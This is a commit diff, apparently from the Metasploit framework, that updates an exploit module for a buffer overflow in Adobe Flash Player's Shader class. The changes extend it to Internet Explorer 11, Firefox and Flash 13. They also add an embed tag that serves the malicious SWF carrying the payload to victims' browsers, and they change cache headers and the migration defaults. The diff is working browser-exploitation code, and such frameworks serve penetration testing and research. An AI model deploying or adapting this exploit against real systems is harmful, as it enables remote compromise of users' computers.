Land #3369 @bugch3ck's support for plugin flash exploitation on adobe_flash_pixel_bender
This commit is contained in:
commit
d35ba208ed
|
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
|
||||
vulnerability occurs in the flash.Display.Shader class, when setting specially
|
||||
crafted data as its bytecode, as exploited in the wild in April 2014. This module
|
||||
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
|
||||
Windows XP SP3, Windows 7 SP1 and Windows 8.
|
||||
has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
|
||||
over Windows XP SP3, Windows 7 SP1 and Windows 8.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
# Disabled by default to allow sessions on Firefox, still useful when exploiting IE
|
||||
#'InitialAutoRunScript' => 'migrate -f',
|
||||
'Retries' => false,
|
||||
'EXITFUNC' => "thread"
|
||||
},
|
||||
|
@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
|
||||
:method => "LoadMovie",
|
||||
:os_name => Msf::OperatingSystems::WINDOWS,
|
||||
:ua_name => Msf::HttpClients::IE,
|
||||
:ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
|
||||
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
|
||||
},
|
||||
'Targets' =>
|
||||
|
@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("Sending SWF...")
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=flash_payload%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
|
Loading…
Reference in New Issue